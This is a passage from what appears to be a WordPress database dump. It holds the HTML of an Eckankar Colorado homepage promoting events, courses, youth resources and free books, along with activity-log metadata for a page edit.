height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236884,40267,'_message_key','post_updated'),(236885,40267,'_user_id','2'),(236886,40267,'_user_login','S8zhaBda'),(236887,40267,'_user_email','nada@zipnadanot.org'),(236888,40267,'_server_remote_addr','76.130.120.x'),(236889,40267,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236890,40268,'post_id','7160'),(236891,40268,'post_type','page'),(236892,40268,'post_title','Home'),(236893,40268,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"margin-top: 24px;\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 